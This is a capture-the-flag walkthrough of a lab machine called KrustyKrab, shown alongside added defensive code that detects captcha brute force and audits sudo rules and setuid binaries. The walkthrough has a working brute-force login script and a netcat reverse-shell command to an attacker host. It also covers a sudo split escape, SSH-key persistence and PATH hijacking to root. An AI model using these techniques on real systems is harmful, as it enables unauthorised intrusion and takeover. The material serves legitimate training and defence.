Reconnaissance
Port 80 serves the default Apache page.
In the page source we find
/var/www/html/finexo
Visiting finexo
there is a login feature.
The first username exists.
In the source of the login page we find a JS file.
It is obviously JSFuck.
Decoded:
function generateCaptcha() {
    $characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    $code = "";
    $seed = time();
    mt_srand($seed);
    for ($i = 0; $i < 4; $i++) {
        $code .= $characters[mt_rand(0, strlen($characters) - 1)];
    }
    $_SESSION['captcha'] = strtolower($code);
    return $code;
}
This gives us the captcha generation logic:
it seeds mt_rand() with the Unix timestamp and picks four characters from the alphabet to form the captcha.
We also find that visiting http://ip/finexo/login.php?action=generateCaptcha
returns the captcha directly, so we write a brute-force script that fetches the captcha from that endpoint before each attempt.
import requests  # requests library, used to send HTTP requests

# Target URLs
# Note: make sure the IP address here is the actual target you are testing!
# Per the earlier discussion, for the original target this should be 'http://192.168.56.132/finexo/login.php'
captcha_url = 'http://192.168.56.132/finexo/login.php?action=generateCaptcha'  # captcha generation endpoint
login_url = 'http://192.168.56.132/finexo/login.php'  # login page URL

# Create a session object
# requests.Session() keeps session state (e.g. cookies), which is essential for the login and captcha mechanism.
session = requests.Session()
cnt = 0  # attempt counter

# Open the rockyou.txt wordlist
# 'r' is read-only mode, encoding="utf-8" sets the file encoding, errors="ignore" skips undecodable bytes
with open('rockyou.txt', 'r', encoding="utf-8", errors="ignore") as f:
    # Iterate over every line (each password) in the wordlist
    for password in f.readlines():
        # Step 1: fetch the captcha
        # Send a GET request to the captcha endpoint, strip whitespace from the response body and lowercase it.
        # This relies on the captcha text being returned directly to the client.
        try:
            captcha_response = session.get(captcha_url)
            captcha = captcha_response.text.strip().lower()
            if not captcha:  # if the captcha is empty, skip this attempt
                print(f" [Warning] Could not get captcha, skipping password: {password.strip()}")
                continue
        except requests.exceptions.RequestException as e:
            print(f" [Error] Failed to fetch captcha: {e}, skipping password: {password.strip()}")
            continue

        # Strip whitespace (such as the newline) from the password read from the wordlist
        password = password.strip()

        # Build the POST data for the login request
        data = {
            'username': 'spongebob',   # the username is known to be 'spongebob'
            'password': f'{password}', # current password from the wordlist
            'captcha': captcha         # freshly fetched captcha
        }

        # Step 2: send the POST request to log in
        # Use the session object to post the data to the login URL
        try_login = session.post(login_url, data=data)
        cnt += 1  # increment the counter after each attempt

        # Print the current password and total attempts to track progress
        print(f"Trying password: {password} (attempt {cnt})")

        # Step 3: check the login result
        # Check whether the response body contains the keyword "successful", which indicates a successful login
        if "successful" in try_login.text:
            print(f"\n--- Success! ---")
            print(f"Login succeeded, password found: {password}")
            # Stop the loop once the password is found
            break
        # If you also want to inspect responses that are neither a success nor a clear error,
        # add more conditions and prints here. Currently the script only prints the success message.
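From the defender's side, the script above leaves a very recognisable trace: every password guess is preceded by a GET to the captcha endpoint, so one client produces a 1:1 stream of captcha fetches and login POSTs within seconds. The following detector is an added example written for this page (not code from the original post or from the finexo application); it parses Apache combined-format access log lines and flags clients that exceed a threshold of paired captcha fetches and login POSTs inside a sliding window. The log lines are constructed samples, and the path names are taken from the box as shown above.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" log format: ip ident user [timestamp] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

LOGIN_PATH = "/finexo/login.php"          # login page seen on the box
CAPTCHA_QUERY = "action=generateCaptcha"  # endpoint that hands the captcha back in plain text


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect_captcha_bruteforce(lines, window_seconds=60, threshold=5):
    """
    Return {ip: (login_posts, captcha_fetches)} for every client that, inside any
    window of `window_seconds`, sent at least `threshold` POSTs to the login page
    AND at least `threshold` fetches of the captcha endpoint. A browser fetches
    the captcha once per page load; a guessing script fetches it once per guess.
    """
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(LOGIN_PATH):
            continue
        if rec["method"] == "GET" and CAPTCHA_QUERY in rec["path"]:
            events[rec["ip"]].append((rec["ts"], "captcha"))
        elif rec["method"] == "POST":
            events[rec["ip"]].append((rec["ts"], "login"))

    alerts = {}
    for ip, evs in events.items():
        evs.sort()
        window = deque()
        for ts, kind in evs:
            window.append((ts, kind))
            # Drop events that have fallen out of the sliding window.
            while (ts - window[0][0]).total_seconds() > window_seconds:
                window.popleft()
            logins = sum(1 for _, k in window if k == "login")
            captchas = sum(1 for _, k in window if k == "captcha")
            if logins >= threshold and captchas >= threshold:
                best = alerts.get(ip, (0, 0))
                if logins > best[0]:
                    alerts[ip] = (logins, captchas)
    return alerts


# Constructed sample log (not taken from the box): six captcha-fetch/login-POST pairs
# from one client within six seconds, plus one ordinary interactive login from another client.
SAMPLE_LINES = []
for sec in range(6):
    ts = f"30/Mar/2025:00:10:{sec:02d} +0000"
    SAMPLE_LINES.append(
        f'192.168.56.118 - - [{ts}] "GET /finexo/login.php?action=generateCaptcha HTTP/1.1" '
        f'200 4 "-" "python-requests/2.31.0"'
    )
    SAMPLE_LINES.append(
        f'192.168.56.118 - - [{ts}] "POST /finexo/login.php HTTP/1.1" 200 1532 "-" "python-requests/2.31.0"'
    )
SAMPLE_LINES += [
    '192.168.56.50 - - [30/Mar/2025:00:12:00 +0000] "GET /finexo/login.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '192.168.56.50 - - [30/Mar/2025:00:12:02 +0000] "GET /finexo/login.php?action=generateCaptcha HTTP/1.1" 200 4 "-" "Mozilla/5.0"',
    '192.168.56.50 - - [30/Mar/2025:00:12:20 +0000] "POST /finexo/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, (logins, captchas) in detect_captcha_bruteforce(SAMPLE_LINES).items():
        print(f"ALERT {ip}: {logins} login POSTs, {captchas} captcha fetches within 60s")
```

The detector keys on the pairing rather than on login POST volume alone, because a captcha that is fetched as often as it is submitted is exactly what a script does and what a person at a browser does not. The real fix is on the application side: the captcha should come from a CSPRNG rather than mt_rand() seeded with time(), should never be returned as text by any endpoint, and should be invalidated after one use.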
Based on the SpongeBob elements found all over the box, we generate a wordlist and brute force with it:
spongebob Spongebob SPONGEBOB spongebob1 spongebob123 spongebob@ spongebob! spongebob_squarepants SpongeBobSquarePants squarepants Squarepants patrick Patrick PATRICK patrick123 star Star squidward Squidward SQUIDWARD tentacles mrkrabs Mrkrabs MrKrabs krabs Krabs pearl Pearl sandy Sandy chipmunk plankton Plankton chum bucket ChumBucket gary Gary meow pineapple Pineapple bikini bottom BikiniBottom krabbypatty KrabbyPatty formula secretformula jellyfish Jellyfish net bubble Bubble blower clarinet Clarinet gloveworld GloveWorld rockbottom RockBottom goofygoober GoofyGoober jellyfishing Jellyfishing chumbucket kelprea thekrustykrab KrustyKrab finexo Finexo finexo123 finexo@ finexo!
We successfully obtain the credentials SpongeBob/squarepants.
An image webshell (图片马) can be uploaded.
Intercepting this request, the role field can be changed,
but that cannot be exploited.
Changing the role directly to Administrator fails, so we cannot become Administrator that way, but we still succeed in changing Administrator's password.
Login successful.
Being administrator is nice: commands can be executed directly.
nc 192.168.56.103 8888 -e /bin/sh
On the listener we receive a shell.
www-data@KrustyKrab:/home$ sudo -l
Matching Defaults entries for www-data on KrustyKrab:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www-data may run the following commands on KrustyKrab:
    (KrustyKrab) NOPASSWD: /usr/bin/split

www-data@KrustyKrab:/home$ sudo -u KrustyKrab split --filter=/bin/sh /dev/stdin
whoami
KrustyKrab
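The rule above is the classic sudoers mistake: split looks harmless, but its own --filter option runs an arbitrary command, so a NOPASSWD rule for it is equivalent to a NOPASSWD shell as the target user. The following audit helper is an added example written for this page (not code from the original post or from any tool on the box); it parses `sudo -l` output, flags NOPASSWD rules, and marks allowed commands that delegate execution through their own options. The DELEGATES_EXECUTION table is an assumption: it holds only the split entry this page demonstrates and is meant to be extended during your own allowlist review. The SUDO_L_OUTPUT text is a constructed copy of the output shown above.

```python
import re

# Constructed copy of the `sudo -l` output shown above.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for www-data on KrustyKrab:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www-data may run the following commands on KrustyKrab:
    (KrustyKrab) NOPASSWD: /usr/bin/split
"""

# Assumed starter table: allowed commands whose own options hand control to another program.
# /usr/bin/split is the entry this page demonstrates; extend it from your own review.
DELEGATES_EXECUTION = {
    "/usr/bin/split": "--filter=COMMAND runs a shell command for every output chunk",
}

# A rule line looks like:  (runas_user) TAG: TAG: /path/to/cmd args, /other/cmd
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_rules(text):
    """Yield (runas, tags, command) for each rule line in `sudo -l` output."""
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m is None:
            continue
        tags = {t.strip(": ") for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            yield m.group("runas").strip(), tags, cmd.strip()


def audit_sudo_rules(text):
    """Return findings for rules that need no password, allow ALL, or delegate execution."""
    findings = []
    for runas, tags, cmd in parse_sudo_rules(text):
        binary = cmd.split()[0]
        reasons = []
        if "NOPASSWD" in tags:
            reasons.append("no password required")
        if binary == "ALL":
            reasons.append("any command allowed")
        elif binary in DELEGATES_EXECUTION:
            reasons.append(DELEGATES_EXECUTION[binary])
        elif not binary.startswith("/"):
            reasons.append("command is not an absolute path")
        if reasons:
            findings.append({
                "runas": runas,
                "command": cmd,
                "nopasswd": "NOPASSWD" in tags,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in audit_sudo_rules(SUDO_L_OUTPUT):
        print(f"({f['runas']}) {f['command']}: " + "; ".join(f["reasons"]))
```

Run it against `sudo -l` output collected from each host (or against the rule lines of /etc/sudoers and /etc/sudoers.d after `visudo -c`). A finding with both "no password required" and a delegation reason is the one to fix first: drop NOPASSWD, or replace the generic utility with a purpose-built wrapper that takes no user-controlled options.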
The user flag is in the KrustyKrab home directory.
For persistence we can set up SSH key login:
mkdir -p ~/.ssh
echo "ssh-rsa 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 root@kali" > ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

┌──(root㉿kali)-[/myift/krus]
└─# ssh KrustyKrab@192.168.56.132 -i id_rsa
The authenticity of host '192.168.56.132 (192.168.56.132)' can't be established.
ED25519 key fingerprint is SHA256:0d4MWSfQ+tUZ0f4j8Wea2uYelBzzcaj0CI4NtYQIx0E.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.132' (ED25519) to the list of known hosts.
Linux KrustyKrab 6.1.0-9-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.27-1 (2023-05-08) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 30 00:15:24 2025 from 192.168.56.118
KrustyKrab@KrustyKrab:~$
There is also a help image in the KrustyKrab directory.
┌──(root㉿kali)-[/myift/krus]
└─# file help
help: GIF image data, version 89a, 480 x 270

KrustyKrab@KrustyKrab:~$ sudo -l
Matching Defaults entries for KrustyKrab on KrustyKrab:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User KrustyKrab may run the following commands on KrustyKrab:
    (spongebob) NOPASSWD: /usr/bin/ttteeesssttt
Run /usr/bin/ttteeesssttt:
KrustyKrab@KrustyKrab:~$ sudo -u spongebob /usr/bin/ttteeesssttt
Spongebob forgot how to make Krabby Patty, You need to help him!
Current shuffled recipe order:
A: Pickles
B: Ketchup
C: Lettuce
D: Patty
E: Onion
F: Top bun
G: Mustard
H: Cheese
I: Tomato
J: Bottom bun
Please enter the correct order using letters (e.g., ABCDEFGHIJ):
Enter 10 letters (A-J):
The answer is in the animated GIF.
KrustyKrab@KrustyKrab:~$ sudo -u spongebob /usr/bin/ttteeesssttt
Spongebob forgot how to make Krabby Patty, You need to help him!
Current shuffled recipe order:
A: Tomato
B: Onion
C: Lettuce
D: Ketchup
E: Pickles
F: Top bun
G: Patty
H: Cheese
I: Bottom bun
J: Mustard
Please enter the correct order using letters (e.g., ABCDEFGHIJ):
Enter 10 letters (A-J): IGCHBADJEF
Validation successful! Perfect Krabby Patty!
spongebob@KrustyKrab:/home/KrustyKrab$
We land directly in a shell as the spongebob user.
spongebob@KrustyKrab:/home/KrustyKrab$ cd
spongebob@KrustyKrab:~$ ls
key1  key2.jpeg  note.txt
spongebob@KrustyKrab:~$ file key1
key1: ASCII text
spongebob@KrustyKrab:~$ cat key1
e1964798cfe86e914af895f8d0291812
spongebob@KrustyKrab:~$ cat note.txt
Squidward is waiting for you!!!!
password is md5($key1$key2).
It's not so hard as you think.
You have new mail in /var/mail/spongebob
spongebob@KrustyKrab:~$
(Squidward looks so cool.)
I thought key2 was hidden inside the image, but I was overthinking it.
Just take the md5 of the image itself:
┌──(root㉿kali)-[/myift/krus]
└─# md5sum key2.jpeg
5e1d0c1a168dc2d70004c2b00ba314ae  key2.jpeg
Then compute the password directly:
┌──(root㉿kali)-[/myift/krus]
└─# echo -n "e1964798cfe86e914af895f8d02918125e1d0c1a168dc2d70004c2b00ba314ae" | md5sum
7ac254848d6e4556b73398dde2e4ef82  -

spongebob@KrustyKrab:/home$ su Squidward
Password:
$ whoami
Squidward
Login successful.
$ find / -perm -u=s -type f 2>/dev/null
/home/Squidward/laststep
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/chsh
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/at
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/mount
/usr/bin/passwd
/usr/sbin/exim4
We find the exploitable setuid file laststep.
$ file laststep
laststep: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b84dc5079c77a9f2f2d82492f95a9c110ec51c87, for GNU/Linux 3.2.0, not stripped
$ strings laststep
/lib64/ld-linux-x86-64.so.2
setgid
setuid
system
__libc_start_main
__cxa_finalize
libc.so.6
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
cat /etc/shadow
;*3$"
GCC: (Debian 12.2.0-14) 12.2.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
test.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
_ITM_deregisterTMCloneTable
_edata
_fini
system@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
_end
__bss_start
main
setgid@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@GLIBC_2.2.5
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
The executable calls setuid()/setgid() and then system() with the command
cat /etc/shadow
Because cat is not given as an absolute path, system() resolves it through the caller's PATH, so PATH hijacking is possible.
$ echo bash > cat
$ ls
cat  laststep
$ chmod 777 cat
$ PATH=.:$PATH
$ ./laststep
root@KrustyKrab:~#
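The `strings` pass above is what gave the game away: a set-uid binary that imports system() and carries a command string whose first word has no slash. The audit below is an added example written for this page (not code from the original post or from the box); it automates that check by walking a directory tree for set-uid regular files, extracting printable strings the way `strings` does, and reporting files that both reference system and contain a bare-name command. The RELATIVE_CMD pattern is a triage heuristic I chose, not a definitive test, and the two byte blobs at the bottom are constructed stand-ins for a vulnerable and a hardened binary, not the real laststep file.

```python
import os
import re
import stat

# Runs of 4 or more printable ASCII bytes, the same rule `strings` applies by default.
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
# Heuristic: first token is a bare program name (no '/'), followed by at least one argument.
RELATIVE_CMD = re.compile(r"^[A-Za-z][A-Za-z0-9_.+-]*\s+\S")


def extract_strings(data, min_len=4):
    """Return the printable strings in a byte blob."""
    return [m.group().decode("ascii") for m in PRINTABLE.finditer(data) if len(m.group()) >= min_len]


def relative_command_strings(data):
    """Strings that look like a command invoked by bare name, i.e. resolved through PATH."""
    return [s for s in extract_strings(data) if RELATIVE_CMD.match(s)]


def uses_system(data):
    """True if the binary references the libc symbol `system` (crude, but it is what `strings` showed)."""
    return "system" in extract_strings(data)


def audit_file(path, data, st):
    """Return a finding dict for one set-uid file, or None if nothing looks wrong."""
    if not uses_system(data):
        return None
    cmds = relative_command_strings(data)
    if not cmds:
        return None
    return {"path": path, "owner_uid": st.st_uid, "commands": cmds}


def audit_suid_tree(root="/"):
    """Walk `root` and return findings for set-uid regular files that pass system() a bare-name command."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
                if not stat.S_ISREG(st.st_mode) or not (st.st_mode & stat.S_ISUID):
                    continue
                with open(path, "rb") as f:
                    data = f.read()
            except OSError:
                continue
            finding = audit_file(path, data, st)
            if finding:
                findings.append(finding)
    return findings


# Constructed byte blobs standing in for binaries (not the real laststep file).
VULNERABLE_BLOB = (b"\x7fELF" + b"\x00" * 8
                   + b"setuid\x00system\x00cat /etc/shadow\x00GCC: (Debian 12.2.0-14) 12.2.0\x00")
HARDENED_BLOB = (b"\x7fELF" + b"\x00" * 8
                 + b"setuid\x00execve\x00/bin/cat\x00/etc/shadow\x00")

if __name__ == "__main__":
    print("vulnerable blob:", relative_command_strings(VULNERABLE_BLOB))
    print("hardened blob:  ", relative_command_strings(HARDENED_BLOB))
    for f in audit_suid_tree("/usr/bin"):
        print(f"{f['path']} (uid {f['owner_uid']}): {f['commands']}")
```

On a real host, expect some noise: any set-uid program that links system() and contains a message such as "invalid option" will trip the pattern, so treat the output as a worklist for manual review rather than a verdict. The hardened blob illustrates what a fixed binary looks like from the outside: no system reference, the program path written out absolutely, and the arguments passed separately, which is what you get from execve() on a fixed path with a sanitised environment instead of a shell command line.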